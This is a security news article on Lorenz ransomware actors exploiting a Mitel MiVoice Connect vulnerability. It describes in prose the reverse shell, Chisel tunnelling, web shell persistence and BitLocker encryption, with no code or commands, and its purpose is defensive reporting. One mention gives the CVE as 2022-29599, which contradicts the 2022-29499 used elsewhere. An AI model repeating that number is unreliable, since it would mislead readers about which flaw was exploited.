Read Time:2 Minute, 12 Second
The Lorenz ransomware operators have been exploiting a previously patched critical security vulnerability in Mitel MiVoice Connect to gain access to target environments for subsequent nefarious activities.
“The first malicious activity was carried out by a Mitel appliance located on the network perimeter,” researchers from cybersecurity firm Arctic Wolf revealed in a report published this week.
“Lorenz exploited CVE-2022-29499, a remote code execution vulnerability in the Mitel Service Appliance component of MiVoice Connect, to gain a reverse shell and subsequently utilise Chisel as a tunnelling tool to pivot into the network.”
Like many other ransomware organisations, Lorenz is notorious for double extortion, in which data is stolen before systems are encrypted. Since February 2021, the actor has targeted small and medium businesses (SMBs) in the United States, China, and Mexico, as well as a lesser number of enterprises in France and Germany.
Cybereason has stated that Lorenz is an “ever-evolving ransomware,” and it is speculated that this is simply a rebranding of the ‘.sZ40’ ransomware from October 2020.
Recent discoveries have found that Mitel VoIP appliances are being weaponised for ransomware attacks. This is similar to what CrowdStrike uncovered, where there was an attempt of a ransomware intrusion that utilised the same tactic to gain remote code execution against an unknown target.
Mitel VoIP solutions are also an excellent starting point owing to the fact that there are almost 20,000 internet-exposed devices on the web, as revealed by security researcher Kevin Beaumont, making them susceptible to malicious assaults.
In one Lorenz ransomware infection investigated by Arctic Wolf, the attackers used the remote code execution flaw to create a reverse shell and download the Chisel proxy software.
This implies that the threat actors can exploit CVE-2022-29499 and gain initial access, either through an initial access broker (IAB) who holds an exploit for CVE-2022-29599 or because they can do so themselves.
The researchers also noted that the Lorenz group waited nearly a month after gaining initial access to perform post-exploitation actions such as setting persistence with a web shell, collecting credentials, network surveillance, privilege escalation, and lateral movement.
The compromise led to the stolen data being uploaded using FileZilla, after which the hosts were encrypted using Microsoft’s BitLocker service. This underscores the fact that adversaries still frequently abuse living-off-the-land binaries (LOLBINs).
The researchers noted that “monitoring just critical assets is not enough for organizations,” and they should instead focus on all devices with external facing, including VoIP and IoT devices. The shift in target by threat actors to lesser known or monitored assets makes detection more difficult.
Happy
0 %
Sad
0 %
Excited
0 %
Sleepy
0 %
Angry
0 %
Surprise
0 %
0
0
